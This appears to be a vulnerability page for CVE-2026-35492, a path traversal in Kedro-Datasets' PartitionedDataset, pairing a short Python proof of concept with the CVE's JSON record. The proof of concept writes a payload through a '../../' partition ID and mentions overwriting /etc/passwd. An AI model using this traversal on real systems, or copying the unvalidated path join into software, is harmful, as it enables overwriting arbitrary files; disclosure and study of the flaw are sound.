CVE-2026-35492

import os # Proof of Concept for CVE-2026-35492 Path Traversal # This simulates the vulnerable behavior in Kedro-Datasets < 9.3.0 def vulnerable_save(base_path, partition_id, data): # Simulate the vulnerable code logic: direct concatenation without validation # In the actual library, this leads to writing outside the intended directory full_path = os.path.join(base_path, partition_id) # Check if the path is normalized (which the vulnerable code fails to enforce properly) print(f"[VULNERABLE] Attempting to write to: {full_path}") # In a real scenario, this would write 'data' to 'full_path' # potentially overwriting sensitive files like ../../etc/passwd with open(full_path, 'w') as f: f.write(str(data)) # Configuration base_directory = "./safe_dataset_folder" # Malicious partition ID containing path traversal sequences malicious_input = "../../arbitrary_file.txt" print(f"Base Directory: {base_directory}") print(f"User Partition ID: {malicious_input}") # Execute the vulnerable operation # This would result in writing to ./arbitrary_file.txt instead of ./safe_dataset_folder/... vulnerable_save(base_directory, malicious_input, "MALICIOUS_PAYLOAD")

{"cve": {"id": "CVE-2026-35492", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:27.620", "lastModified": "2026-04-16T14:45:19.723", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kedro-Datasets is a Kendo plugin providing data connectors. Prior to 9.3.0, PartitionedDataset in kedro-datasets was vulnerable to path traversal. Partition IDs were concatenated directly with the dataset base path without validation. An attacker or malicious input containing .. components in a partition ID could cause files to be written outside the configured dataset directory, potentially overwriting arbitrary files on the filesystem. Users of PartitionedDataset with any storage backend (local filesystem, S3, GCS, etc.) are affected. This vulnerability is fixed in 9.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/kedro-org/kedro-plugins/pull/1346", "source": "[email protected]"}, {"url": "https://github.com/kedro-org/kedro-plugins/security/advisories/GHSA-cjg8-h5qc-hrjv", "source": "[email protected]"}, {"url": "https://github.com/kedro-org/kedro/issues/5452", "source": "[email protected]"}]}}